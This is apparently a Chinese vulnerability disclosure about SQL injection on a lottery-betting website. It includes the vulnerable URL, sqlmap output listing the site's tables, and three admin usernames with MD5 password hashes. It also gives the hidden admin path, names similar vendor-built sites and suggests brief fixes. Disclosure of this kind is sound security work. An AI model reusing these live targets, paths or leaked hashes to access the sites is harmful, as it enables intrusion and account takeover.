其实我也不知道他们是正规还是不正规的网站,但是使用的人不少就是了。反正我们主要是讲技术,要是被忽略也没关系。
前台检测倒是没有检查出来问题,问题在于支付过后,将出现SQL注入。
先完善一下资料,然后得到2元。2元就可以买一注,省了我的钱。正因为这两元引发了这次大规模的检测。
我们来到这个页面
http://www.zhongfuti.com/Trade/Dlt/Project_Info.html?id=103233
然后我用sqlmap。
Database: newzhongfuti
[22 tables]
+------------------+
| KR_About |
| KR_Admin |
| KR_Announce |
| KR_Bank_Back |
| KR_Buy |
| KR_Config |
| KR_Follow |
| KR_Link |
| KR_Login |
| KR_Lottery_Code |
| KR_Lottery_Foot |
| KR_Lottery_Info |
| KR_Lottery_Issue |
| KR_Lottery_Win |
| KR_NewsClass |
| KR_NewsClass |
| KR_Notes |
| KR_PayBank |
| KR_PaymentPlat |
| KR_Point |
| KR_User |
| dtproperties |
+------------------+
好的,搞一下密码吧。
| huchaoyang | DD90B9A4DFF00B364C4E25FFC1AF3AA8 |
| xyc | E10ADC3949BA59ABBE56E057F20F883E |
| admin | E244F1E36FDC36803319D329FAADD3B6 |
漏洞证明:
我们登录一下后台,后台你是扫不到的。我是意外得到的
http://www.zhongfuti.com/admin708/index.html
后台可以发现,提供商叫行知网络
同样,发现这样的caipiao网站不少,不下百个.关键词不给出了,反正合不合法我不知道啦,正规的有,不正规的也有。例如:
http://bssags.com/ 梵客caipiao网
http://www.futizaixian.com 福体在线 后台也是那个。
都是一样的小星星啊。
不敢深入了,你们不要打我啊,给我中一个200块啊,买这么多次了都没有中奖。厂商要是没有给rank的话,wooyun适当看看呗。
PS.厂商真不知道是不是这个,管理顺便帮忙找一下哦。我要上班了哇。
修复方案:
1.过滤
2.修改默认后台路劲